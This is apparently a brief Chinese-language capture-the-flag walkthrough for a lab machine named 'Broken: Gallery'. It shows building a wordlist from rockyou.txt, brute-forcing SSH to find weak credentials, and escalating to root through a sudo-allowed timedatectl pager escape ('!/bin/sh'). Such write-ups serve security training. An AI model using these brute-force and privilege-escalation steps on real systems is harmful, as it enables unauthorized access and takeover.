Broken: Gallery

usershell

目标IP:192.168.205.146

服务信息:

22/tcp open  ssh
80/tcp open  http

web服务只是单纯的前端页面，什么都没有，只剩爆破ssh一条路可以走了

cat ~/wordlists/rockyou.txt|grep broken > dic.txt

拆分一个小字典出来，爆破ssh

[22][ssh] host: 192.168.205.146   login: broken   password: broken

登录ssh拿到user权限

rootshell

sudo -l

 (ALL) NOPASSWD: /usr/bin/timedatectl

可以提权

sudo timedatectl list-timezones
!/bin/sh